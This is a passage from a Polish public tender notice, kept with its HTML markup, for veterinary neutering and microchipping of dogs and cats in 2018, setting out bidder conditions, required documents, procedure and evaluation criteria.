kastracja >25 kg: 17 sztuk,?	znakowanie: 95 sztuk.3. Znakowanie elektroniczne (mikrochipem) wszystkich dostarczonych na skierowanie psów i kotów domowych, posiadających właściciela.4. Zamawiający nie przewiduje możliwości pozostawiania zwierząt w lecznicy (a tym samym naliczanie dób za pobyt zwierzęcia). Zwierzęta po wykonanych zabiegach muszą zostać odebrane przez właściciela, poza sytuacjami zagrożenia życia. Te wykonawca zobowiązany jest wkalkulować w ofertę.5. Wykonanie zabiegów opisanych w ust. 3 odbywać się musi w zabezpieczeniu antybiotykowym. 6. Wykonawca ponosi pełną odpowiedzialność za zwierzęta przekazane przez właścicieli/opiekunów w celu wykonania usług, o których mowa w ust. 2. 7. Znakowanie zwierząt odbywać się musi microchipem, a dane właściciela muszą zostać przez wykonawcę umieszczone w bazie Safe-Animal. 8. Cena ofertowa wykonawcy musi uwzględniać wszelkie koszty wykonania danej usługi weterynaryjnej, materiały, pracę wykwalifikowanych osób, leki, w tym ,,nadprogramowy" pobyt zwierzęcia w lecznicy, o którym mowa w ust. 4, itp. Cena za dany zabieg jest ceną ryczałtową. 9. Zamawiający nie będzie pokrywał żadnych innych kosztów, niż te wskazane przez wykonawcę w formularzu ofertowym. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">85200000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu podobnych usług tj. usług tego samego rodzaju co prace stanowiące przedmiot zamówienia.2. Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 30 % wartości zamówienia podstawowego.3. Przedmiotowe usługi zostaną udzielone w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 6 ustawy Pzp..</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2018-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 1)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 pkt 12-23 oraz ust. 5 pkt 1 ustawy Pzp;2)	spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej: a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej tj. posiadają wpis do ewidencji zakładów leczniczych dla zwierząt prowadzonej przez Okręgową Radę Izby Lekarsko - Weterynaryjnej. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu:a)	odpisu z właściwego rejestru lub z centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;b)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;c)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale X. 6. 2) lit. a) - c) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:a)	nie otwarto jego likwidacji ani nie ogłoszono upadłościb)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne, albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.Dokument, o którym mowa w rozdziale X. 7. lit. a) SIWZ, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w rozdziale X. 7. lit b), powinny być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w rozdziale X. 7 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełniania warunków, o których mowa w rozdziale VIII SIWZ:a) zaświadczenie o wpisie do ewidencji zakładów leczniczych dla zwierząt, prowadzonej przez Okręgową Radę Izby Lekarsko - Weterynaryjnej, o którym mowa w art. 17 ustawy z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt (Dz.U. z 2015 r. poz. 1047 ze zm).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o których mowa w art. 86 ust. 5 ustawy Pzp przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (oświadczenie wg wzoru załącznika nr 3 do SIWZ).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin płatności</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">cz.1. zgodnie z paragrafem 7 projektu umowycz.2. zgodnie z paragrafem 6 projektu umowycz.3. zgodnie z paragrafem 6 projektu umowy</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-12-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> 